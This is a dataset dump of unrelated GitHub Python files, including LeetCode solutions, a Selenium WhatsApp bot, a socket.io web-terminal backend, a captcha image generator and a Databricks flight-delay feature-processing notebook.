GeV fm\n landau = (\n abs(particle_charge / (q_d))\n * np.pi\n / Nx\n / Ny\n * (HBARC / spacing) ** 2\n / mass\n )\n return landau\n\n\nif __name__ == \"__main__\":\n shift = np.asarray([0.0259, 0.0443])\n shift_err = np.asarray([0.0033, 0.0056])\n shift_gv = gv.gvar(shift, shift_err)\n mass = gv.gvar(1.053819, 0.011708)\n fit = PolarisabilityFit(\n \"proton_1\",\n Structure(\"uds\"),\n configIDs.PACS_ensembles[13770][\"a\"],\n mass,\n shift_gv,\n )\n fit.do_fit()\n print(fit.average_fit)\n print(fit.convert_fit(fit.average_fit.pmean, fit.ensemble.a))","repo_name":"TommiKabelitz/Physics-utilities","sub_path":"utilities/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3837372355","text":"from io import open\nfrom setuptools import setup\n\n\nversion = \"0.0.3\"\n\nwith open(\"README.md\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"pip_command\",\n version=version,\n\n author=\"pavelgs\",\n author_email=\"p6282813@yandex.ru\",\n\n description=\"lib for fast work with pip commands\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n\n url=\"https://github.com/pavelglazunov/pip-command\",\n\n license=\"Apache License, Version 2.0, see LICENSE file\",\n\n packages=[\"pip_command\"]\n)","repo_name":"pavelglazunov/pip-command","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31638124278","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom collections import defaultdict\n\nn,X = map(int,readline().split())\nxyc = list(map(int,read().split()))\n\n\nlinks = [[] for _ in range(n+1)]\nit = iter(xyc)\nfor x,y,c in zip(it,it,it):\n links[x].append((c,y))\n links[y].append((c,x))\n\nnum = [-1] * (n+1)\nnum[1] = 0\nstack = [1]\nwhile(stack):\n i = stack.pop()\n for c,j in links[i]:\n if(num[j] != -1):\n continue\n num[j] = num[i] ^ c\n stack.append(j)\n\nd = defaultdict(int)\nans = 0\nfor i,num_i in enumerate(num[1:],1):\n ans += d[num_i^X]\n d[num_i] += 1\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc045_old/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71888475689","text":"# leetcode 2389. Longest Subsequence With Limited Sum\n\nclass Solution:\n def answerQueries(self, nums: List[int], queries: List[int]) -> List[int]:\n target = list(accumulate(sorted(nums)))\n answer = list()\n for query in queries :\n answer.append(bisect_right(target,query))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/12월/1225/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"33010048449","text":"#!/usr/bin/python3\n\nimport random\n\ng1Count = 0\ng2Count = 0\n\nfor x in range (1,10000000):\n car = random.randint(1, 3)\n guess1 = 1\n if car == 1:\n g1Count += 1\n else:\n g2Count += 1\n\nprint (\"Guess 1 Count: %d\"%g1Count)\nprint (\"Guess 2 Count: %d\"%g2Count)\n","repo_name":"ian-flint/monty","sub_path":"monty.py","file_name":"monty.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22269615510","text":"class Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n i = 0 # Initialize the left pointer to the start of the array\n j = len(nums) - 1 # Initialize the right pointer to the end of the array\n \n while i < j: # Perform binary search until left and right pointers meet\n mid = int((i + j) / 2) # Calculate the middle index\n \n if nums[mid] < nums[mid + 1]: # If the element at mid is smaller than the next element\n i = mid + 1 # Move the left pointer to mid + 1\n else:\n j = mid # Otherwise, move the right pointer to mid\n \n return i # Return the index i as the peak element index\n","repo_name":"ofmukesh/Learning","sub_path":"LeetCode_Top_150/findPeakElement.py","file_name":"findPeakElement.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16002402445","text":"from selenium import webdriver\nimport time\n\nbrowser = webdriver.Chrome('/home/disciple/chromedriver')\nbrowser.get('https://web.whatsapp.com/')\n\ntime.sleep(15)\n\nuser_name = 'Whatsapp bot'\n\nuser = browser.find_element_by_xpath('//span[@title=\"{}\"]'.format(user_name))\nuser.click()\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\nmessage_box.send_keys('Hey, I am your whatsapp bot')\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[3]/button')\nmessage_box.click()\n","repo_name":"Gurupra5ad/whatsapp-automation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15120644716","text":"import random\nimport sys\nfrom time import sleep\n\n\nclass Game:\n def __init__(self, lower, upper, number_of_guesses):\n super().__init__()\n self.lower = lower\n self.upper = upper\n self.number_of_guess = number_of_guesses\n self.name = None\n self.guess = None\n self.sleep_time = 2 # Sleeping to add effect.\n self.secret_number = None\n self.correctly_guessed = None\n self.ending_answer = None\n\n def welcome_sequence(self):\n print(\"Hello, what is your name?\")\n self.name = input()\n\n print(f\"Well, {self.name}, I am thinking of a number between {self.lower} and {self.upper}. Can you guess it?\")\n sleep(self.sleep_time)\n print(f\"You have {self.number_of_guess} guesses; use them wisely.\")\n sleep(self.sleep_time)\n\n self.begin_guessing()\n\n def begin_guessing(self):\n self.secret_number = random.randint(self.lower, self.upper)\n self.correctly_guessed = False\n\n print(f\"Alright, {self.name}, start guessing by entering an integer!\")\n for guess_number in range(self.number_of_guess):\n self.grab_guess()\n if self.guess > self.secret_number:\n print(\"That's too high!\")\n elif self.guess < self.secret_number:\n print(\"That's too low!\")\n elif self.guess == self.secret_number:\n print(f\"You correctly guessed the number in {guess_number} amount of tries!\")\n self.correctly_guessed = True\n self.ending()\n self.ending()\n\n def ending(self):\n self.ending_answer = None\n\n if self.correctly_guessed:\n sleep(self.sleep_time)\n print(f\"I'm impressed {self.name}. Guessing the correct number was not an easy task.\")\n else:\n print(f\"Unfortunately you ran out of guesses. The secret number was {self.secret_number}.\")\n\n sleep(self.sleep_time)\n print(f\"What do you say {self.name}, would you like to play again? (y/n):\")\n self.ending_answer = input()\n\n if self.ending_answer == 'y':\n self.begin_guessing()\n else:\n print(\"Thanks for playing!\")\n\n sleep(self.sleep_time)\n sys.exit()\n\n def grab_guess(self):\n try:\n self.guess = int(input())\n except ValueError:\n print(\"That's not an integer, try again...\")\n self.grab_guess()\n\n\nif __name__ == '__main__':\n Game(1, 20, 5).welcome_sequence()\n","repo_name":"SinfulPhantom/Guessing-Game","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71732261929","text":"import os, sys\nimport struct\nimport pty, fcntl, termios\nimport time\nimport array\n\nimport subprocess\nimport asyncio\n\nimport json\nimport platform\n\n\ntry:\n import socketio\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install python-socketio\", shell=True, check=True)\n import socketio\n\ntry:\n import uvicorn\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install uvicorn[standard]\", shell=True, check=True)\n import uvicorn\n\n\nPORT = 0\nSHELL = \"\"\nCHILD = 0\n\nclass TTY:\n pid = None\n fd = None \n\n def __init__(self):\n try:\n pid, fd = pty.fork()\n except OsError as e:\n print(f\"OSError: {e}\")\n\n if pid < 0:\n # error\n print(\"pty fork error!\")\n elif pid == CHILD:\n sys.stdout.flush()\n try:\n os.environ[\"TERM\"] = \"xterm-256color\"\n os.execl(SHELL, SHELL)\n except:\n print(\"execl failed!\")\n\n else:\n self.pid = pid\n self.fd = fd\n\n self.resize(0, 0)\n\n tcattrib = termios.tcgetattr(fd)\n tcattrib[3] = tcattrib[3] & ~(termios.ICANON)\n termios.tcsetattr(fd, termios.TCSAFLUSH, tcattrib)\n\n \n def resize(self, cols, rows):\n fcntl.ioctl(self.fd, termios.TIOCSWINSZ, struct.pack(\"HHHH\", rows, cols, 0, 0))\n\n def write(self, bytes):\n try:\n os.write(self.fd, bytes)\n except OSError as e:\n print(f\"os.write() error: {e}\")\n \n\n def read(self):\n buf = array.array('i', [0])\n query = termios.FIONREAD\n if platform.system() == \"Darwin\":\n query = termios.TIOCOUTQ\n if fcntl.ioctl(self.fd, query, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(self.fd, buf[0])\n \n def tcDrain(self):\n termios.tcdrain(self.fd)\n\n def close(self):\n self.write(b\"\\0\")\n os.close(self.fd)\n\n\ndef readSTDIN():\n buf = array.array('i', [0])\n if fcntl.ioctl(sys.stdin.fileno(), termios.FIONREAD, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(sys.stdin.fileno(), buf[0])\n\nserver = socketio.AsyncServer(async_mode='asgi', cors_allowed_origins=\"*\")\napp = socketio.ASGIApp(server)\n\nconnections = {}\n\nasync def ttyFN():\n while True:\n for sid, tty in connections.items():\n data = tty.read()\n if data:\n await server.emit(\"dat2fe\", data=data, to=sid)\n\n await asyncio.sleep(0.01)\n\n@server.event\nasync def connect(sid, environ, auth):\n print(f\"connection: {sid}\")\n connections[sid] = TTY()\n await server.emit(\"reqResz\", to=sid)\n\n@server.on(\"dat2be\")\nasync def dataToBackend(sid, data):\n connections[sid].write(bytes(data, \"utf-8\"))\n\n@server.on(\"resz\")\nasync def reszCB(sid, data):\n obj = json.loads(data)\n cols = int(obj[\"cols\"])\n rows = int(obj[\"rows\"])\n connections[sid].resize(cols, rows)\n\n@server.event\ndef disconnect(sid):\n print(f\"disconnect: {sid}\")\n connections[sid].close()\n connections.pop(sid)\n\n# load settings\nwith open(\"backend-config.json\") as config_file:\n contents = config_file.read()\n config = json.loads(contents)\n PORT = int(config[\"port\"])\n SHELL = config[\"shell\"]\n\nprint(f\"starting server: PORT={PORT}, SHELL={SHELL}\")\n\nloop = asyncio.new_event_loop()\nconfig = uvicorn.Config(app=app, host=\"127.0.0.1\", port=PORT, loop=loop)\ns = uvicorn.Server(config)\nfut = loop.create_task(s.serve())\nloop.create_task(ttyFN())\nloop.run_until_complete(fut)\n\n","repo_name":"theVerySharpFlat/webterm","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"641800413","text":"'''\n127. Word Ladder\nhttps://leetcode.com/problems/word-ladder/\n'''\n\n\nfrom collections import defaultdict, deque\n\n\n# BFS\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n wordSet = set(wordList)\n queue = deque([(beginWord, 0)])\n seen = set([beginWord])\n maskMap = defaultdict(list)\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps + 1\n for i in range(len(beginWord)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate not in seen:\n seen.add(candidate)\n queue.append((candidate, steps+1))\n return 0\n\n\n# Bidirectional BFS\nclass Solution2:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n queue_begin = deque([(beginWord)])\n queue_end = deque([(endWord)])\n seen_begin = {beginWord: 1}\n seen_end = {endWord: 1}\n maskMap = defaultdict(list)\n \n if endWord not in wordList:\n return 0\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n def bfs(queue, seen_self, seen_other):\n queue_len = len(queue)\n for _ in range(queue_len):\n word = queue.popleft()\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate in seen_other:\n return seen_other[candidate] + seen_self[word]\n if candidate not in seen_self:\n seen_self[candidate] = seen_self[word] + 1\n queue.append((candidate))\n \n while queue_begin and queue_end:\n if len(queue_begin) <= len(queue_end):\n ans = bfs(queue_begin, seen_begin, seen_end)\n else:\n ans = bfs(queue_end, seen_end, seen_begin)\n if ans:\n return ans\n\n return 0\n","repo_name":"supawichable/leetcode","sub_path":"0127_word_ladder.py","file_name":"0127_word_ladder.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14993265039","text":"\n\nfrom math import *\nfrom numpy import *\nimport numpy\nimport pylab as p\nimport random\nimport itertools as itt\n\ndef L(x, k, X ):\n s=1.0\n for j in range(len(X)):\n if j != k:\n s *= float(x-X[j])/(X[k]-X[j])\n return s\n\n\nq=20\n\n[theta1, theta2] = mgrid[0.0: pi+pi/(q-1): pi/(q-1), 0.0: pi+pi/(q-1): pi/(q-1) ]\nz1 = numpy.vectorize(lambda t1,t2: 0.5*cos(t1))\nz2 = numpy.vectorize(lambda t1,t2: 0.5*cos(t2))\nZ1 = z1(theta1, theta2)\nZ2 = z2(theta1, theta2)\n\ntheta = arange( 0.0, pi+pi/(q-1), pi/(q-1) )\nZ = [ 0.5*cos(t) for t in theta]\n\nf = lambda x,y: cos(x*4.0*pi)*sin(y*4.0*pi)\n\nf_ = numpy.vectorize(f)\nF = f_(Z1,Z2)\n\nL2 = lambda z1,z2,i1,i2: L(z1, i1, Z )*L(z2, i2, Z ) \ng = lambda z1,z2: sum([ L2(z1,z2,i1,i2)*F[i1][i2] for (i1,i2) in itt.product(range(q),range(q)) ])\n\n\nX = [ (random.uniform(-0.5,0.5),random.uniform(-0.5,0.5)) for k in range(100) ]\n\nY1 = [ f(z1,z2) for (z1,z2) in X ]\nY2 = [ g(z1,z2) for (z1,z2) in X ]\n\n\nerr = []\nfor k in range(len(Y1)):\n try:\n err.append( log10(abs(Y1[k] -Y2[k])/abs(Y1[k])+1E-17) )\n except:\n pass\n\nimport pylab as p\np.hist(err, bins=30)\np.show()\n\n\n\n\n\n\n\n","repo_name":"nmaxwell/research","sub_path":"FIO/butterfly/approx/interp2D.py","file_name":"interp2D.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"26097703503","text":"from __future__ import division\n\nfrom typing import Union\nimport numbers\nimport numpy\nfrom numpy import ndarray\nfrom pyproj import Proj\nfrom resippy.image_objects.earth_overhead.earth_overhead_point_calculators.abstract_earth_overhead_point_calc \\\n import AbstractEarthOverheadPointCalc\nfrom scipy.spatial.ckdtree import cKDTree\n\n\nclass IGMPointCalc(AbstractEarthOverheadPointCalc):\n def __init__(self,\n lon_array, # type: ndarray\n lat_array, # type: ndarray\n alt_array, # type: Union[ndarray, float]\n projection, # type: Proj\n ):\n self._lons = lon_array\n self._lats = lat_array\n self._npix_y, self._npix_x = lon_array.shape\n self.set_projection(projection)\n if isinstance(alt_array, numbers.Number):\n self._alts = numpy.zeros_like(lon_array)\n else:\n self._alts = alt_array\n self._bands_coregistered = True\n\n self._lons_1d = None # type: ndarray\n self._lats_1d = None # type: ndarray\n self._kd_tree = None # type: KDTree\n self.set_approximate_lon_lat_center(lon_array[int(self._npix_y/2), int(self._npix_x/2)],\n lat_array[int(self._npix_y/2), int(self._npix_x/2)])\n\n @property\n def lon_image(self):\n return self._lons\n\n @property\n def lat_image(self):\n return self._lats\n\n @property\n def alt_image(self):\n return self._alts\n\n def _pixel_x_y_alt_to_lon_lat_native(self, pixel_xs, pixel_ys, alts=None, band=None):\n return self._lons[pixel_ys, pixel_xs], self._lats[pixel_ys, pixel_xs]\n\n def _lon_lat_alt_to_pixel_x_y_native(self, lons, lats, alts, band=None):\n if self._lons_1d is None:\n self._lons_1d = numpy.ravel(self._lons)\n if self._lats_1d is None:\n self._lats_1d = numpy.ravel(self._lats)\n if self._kd_tree is None:\n kd_tree_data = numpy.transpose((self._lons_1d, self._lats_1d))\n self._kd_tree = cKDTree(kd_tree_data)\n\n distances, indices_1d = self._kd_tree.query(numpy.asarray((lons, lats)).transpose(), 6)\n indices_2d = numpy.unravel_index(indices_1d, (self._npix_y, self._npix_x))\n\n # Perform the interpolation here using an inverse distance weighted method\n distances[numpy.isclose(distances, 0)] = 0.00000001\n inv_distances = 1 / distances\n inv_distances_sum = numpy.sum(1 / distances, axis=1)\n interpolated_y_vals = numpy.sum(inv_distances * indices_2d[0], axis=1) / inv_distances_sum\n interpolated_x_vals = numpy.sum(inv_distances * indices_2d[1], axis=1) / inv_distances_sum\n return interpolated_x_vals, interpolated_y_vals\n\n","repo_name":"BeamIO-Inc/resippy","sub_path":"resippy/image_objects/earth_overhead/earth_overhead_point_calculators/igm_point_calc.py","file_name":"igm_point_calc.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"32168944737","text":"\n\n# coding: utf-8\n\n\n# Create a image\n\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\nimport random\n\ndef get_rnd_color():\n\treturn (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n\ndef get_rnd_code(n):\n\tcode = ''\n\tfor i in range(n):\n\t\tcode = code + str(chr(random.randint(65, 90)))\n\treturn code\n\nwidth, height = 150, 50\n\nimage = Image.new('RGB', (width, height))\n\ndraw = ImageDraw.Draw(image)\n\nfor i in range(width):\n\tfor j in range(height):\n\t\tdraw.point((i, j), get_rnd_color())\n\nfont = ImageFont.truetype('arial.ttf', 25)\n\ndraw.text((10, 10), get_rnd_code(7), fill=(255, 255, 255, 1), font=font)\n# image = image.filter(ImageFilter.BLUR)\n\n\nimage.save('./code.png')\n\n\n","repo_name":"renhongl/python_demo","sub_path":"python_demo_v1/study/study_image_lib.py","file_name":"study_image_lib.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"16387521735","text":"# Databricks notebook source\n# import libraries\nimport pyspark.sql.functions as F\nfrom pyspark.sql.types import *\nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfrom pyspark.sql import functions as f\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import monotonically_increasing_id\nfrom pyspark.sql.functions import isnan, when, count, col, isnull, percent_rank, avg, mean\nfrom pyspark.sql.functions import min\nfrom pyspark.sql.functions import col, max\nfrom pyspark.sql.functions import format_string\nfrom pyspark.sql.functions import substring\nfrom pyspark.sql.functions import concat_ws\nfrom pyspark.sql.functions import concat\nfrom pyspark.sql.functions import to_timestamp\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import to_utc_timestamp\nfrom pyspark.sql.functions import expr\nfrom pyspark.sql.functions import regexp_replace\nfrom pyspark.sql.functions import instr\nfrom pyspark.sql.functions import row_number\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import IntegerType\n\nfrom pyspark.ml.linalg import DenseVector, SparseVector, Vectors\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler, StringIndexer,OneHotEncoder\nfrom pyspark.ml.classification import MultilayerPerceptronClassifier\n\n\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.ml.classification import GBTClassifier\n\nfrom pyspark.ml.classification import RandomForestClassifier, DecisionTreeClassifier, LogisticRegression\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator, BinaryClassificationEvaluator\n\n# COMMAND ----------\n\n#Initializes blob storage credentials/location\nblob_container = \"w261-sec4-group2\" # The name of your container created in https://portal.azure.com\nstorage_account = \"kdevery\" # The name of your Storage account created in https://portal.azure.com\nsecret_scope = \"sec4-group2\" # The name of the scope created in your local computer using the Databricks CLI\nsecret_key = \"w261-key\" # The name of the secret key created in your local computer using the Databricks CLI \nblob_url = f\"wasbs://{blob_container}@{storage_account}.blob.core.windows.net\"\nmount_path = \"/mnt/mids-w261\"\n\n#Points to SAS token\nspark.conf.set(\n f\"fs.azure.sas.{blob_container}.{storage_account}.blob.core.windows.net\",\n dbutils.secrets.get(scope = secret_scope, key = secret_key)\n)\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Validation Folds\n\n# COMMAND ----------\n\n#feature processing of dfs\n\ntrain_df=train_df.select(\"*\", f.row_number().over(Window.partitionBy().orderBy(\"Date_Time_sched_dep_utc\")).alias(\"Index\"))\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\n#string indexing of carrier\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\ntrain_df = carrier_indexer.fit(train_df).transform(train_df)\n\n\n#one hot encoding\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\ntrain_df = onehotencoder_carrier_vector.fit(train_df).transform(train_df)\n\n# COMMAND ----------\n\n#splitting training dataframe into five folds contained in dictionary \"d\"\n\nd = {}\nfolds = ['df1','df2','df3','df4','df5']\n\neach_len = train_df.count()/5\nstart = 1\nval_size = each_len/5\nstop = each_len\nprecision_list = []\n\nfor fold in folds:\n d[fold] = train_df.filter(col('Index').between(start,stop))\\\n .withColumn('cv', F.when(col('Index').between(start,(stop-val_size)), 'train')\n .otherwise('val'))\n start += each_len\n stop += each_len\n\n \n\n# COMMAND ----------\n\ntrain_df.createOrReplaceTempView('train_view')\n\n# COMMAND ----------\n\n# MAGIC %sql \n# MAGIC \n# MAGIC SELECT holiday_period,mean_carrier_delay,Pagerank_Score,\n# MAGIC PREV_FLIGHT_DELAYED,origin_percent_delayed,\n# MAGIC dest_percent_delayed,\n# MAGIC ORIGIN_Prophet_trend,\n# MAGIC ORIGIN_Prophet_pred,\n# MAGIC DEST_Prophet_trend,\n# MAGIC DEST_Prophet_pred\n# MAGIC FROM train_view\n# MAGIC LIMIT 10\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT COUNT(*)\n# MAGIC FROM train_view\n# MAGIC WHERE ORIGIN_Prophet_trend IS NULL\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\ntrain_df.columns\n\n# COMMAND ----------\n\ndef process_fold_df(fold_df):\n \n \n #imputation\n fold_df.createOrReplaceTempView(\"fold_view\")\n \n imputation_columns = ['CRS_ELAPSED_TIME','HourlyAltimeterSetting','HourlyDewPointTemperature',\n 'HourlyDryBulbTemperature','HourlyRelativeHumidity','HourlySeaLevelPressure',\n 'HourlyStationPressure','HourlyVisibility','HourlyWetBulbTemperature',\n 'HourlyWindDirection','mean_carrier_delay','ORIGIN_Prophet_trend',\n 'ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred',]\n\n means = {}\n\n for impute_col in imputation_columns:\n mean = spark.sql(f\"SELECT AVG({impute_col}) FROM fold_view\").collect()[0][0]\n means[impute_col] = mean\n \n print(means)\n \n #fill Nones and Nans - Seems to error sometimes?\n fold_df = fold_df.fillna(0,[\"HourlyWindGustSpeed\"]) \\\n .fillna(means[\"CRS_ELAPSED_TIME\"],[\"CRS_ELAPSED_TIME\"]) \\\n .fillna(means[\"HourlyAltimeterSetting\"],[\"HourlyAltimeterSetting\"]) \\\n .fillna(means[\"HourlyDewPointTemperature\"],[\"HourlyDewPointTemperature\"]) \\\n .fillna(means[\"HourlyDryBulbTemperature\"],[\"HourlyDryBulbTemperature\"]) \\\n .fillna(0,[\"HourlyPrecipitation\"]) \\\n .fillna(means[\"HourlyRelativeHumidity\"],[\"HourlyRelativeHumidity\"]) \\\n .fillna(means[\"HourlySeaLevelPressure\"],[\"HourlySeaLevelPressure\"]) \\\n .fillna(means[\"HourlyStationPressure\"],[\"HourlyStationPressure\"]) \\\n .fillna(means[\"HourlyVisibility\"],[\"HourlyVisibility\"]) \\\n .fillna(means[\"HourlyWetBulbTemperature\"],[\"HourlyWetBulbTemperature\"]) \\\n .fillna(means[\"HourlyWindDirection\"],[\"HourlyWindDirection\"]) \\\n .fillna(0,[\"HourlyWindSpeed\"]) \\\n .fillna(\"\",[\"TAIL_NUM\"])\\\n .fillna(0,['holiday_period'])\\\n .fillna(means['mean_carrier_delay'],['mean_carrier_delay'])\\\n .fillna(0,['PREV_FLIGHT_DELAYED'])\\\n .fillna(0,['origin_percent_delayed'])\\\n .fillna(0,['dest_percent_delayed'])\\\n .fillna(means['ORIGIN_Prophet_trend'],['ORIGIN_Prophet_trend'])\\\n .fillna(means['ORIGIN_Prophet_pred'],['ORIGIN_Prophet_pred'])\\\n .fillna(means['DEST_Prophet_trend'],['DEST_Prophet_trend'])\\\n .fillna(means['DEST_Prophet_pred'],['DEST_Prophet_pred'])\n \n\n \n #vector assembler\n feature_cols = ['MONTH','DAY_OF_MONTH','DAY_OF_WEEK','DISTANCE','HourlyWindSpeed','Rain','Blowing','Snow','Thunder','CloudySkyCondition','carrier_vec', 'holiday_period','mean_carrier_delay','Pagerank_Score','PREV_FLIGHT_DELAYED','origin_percent_delayed','dest_percent_delayed','ORIGIN_Prophet_trend','ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred']\n #assemble = VectorAssembler(inputCols=feature_cols, outputCol='features')\n #outputCol = \"features\"\n df_va = VectorAssembler(inputCols = feature_cols, outputCol = 'feature_vector')\n model_input = df_va.transform(fold_df)\n \n #rename delay flag to label\n model_input = model_input.withColumnRenamed(\"DEP_DEL15\",\"label\")\n #model_input = assemble.transform(fold_df) \\\n # .withColumnRenamed('DEP_DEL15', 'label')\n \n #scaling\n scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n model_input = scaler.fit(model_input).transform(model_input)\n \n #check if cv exists, should only exist for cross fold validation not on full train, test\n if 'cv' in model_input.columns:\n model_input = model_input.select('label', 'scaled_feature_vector','cv')\n else:\n model_input = model_input.select('label', 'scaled_feature_vector')\n \n return model_input\n\n# COMMAND ----------\n\nd_processed = {}\nfor key in d.keys():\n print(key)\n d_processed[key] = process_fold_df(d[key])\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# d_processed['df1'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_1\")\n# d_processed['df2'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_2\")\n# d_processed['df3'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_3\")\n# d_processed['df4'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_4\")\n# d_processed['df5'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_5\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Full Train and Test Sets\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n#string indexing of carrier for train\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\nindexer_transformer = carrier_indexer.setHandleInvalid(\"keep\").fit(train_df)\ntrain_df = indexer_transformer.transform(train_df)\n\n#one hot encoding for train\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\nonehotencoder_transformer = onehotencoder_carrier_vector.fit(train_df)\ntrain_df = onehotencoder_transformer.transform(train_df)\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\n#string indexing of carrier for test\n#one hot encoding for test\ntest_df = indexer_transformer.transform(test_df)\ntest_df = onehotencoder_transformer.transform(test_df)\n\n# COMMAND ----------\n\nlen(indexer_transformer.labels)\n\n# COMMAND ----------\n\n#cast holiday to integer\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\nprocessed_train_df = 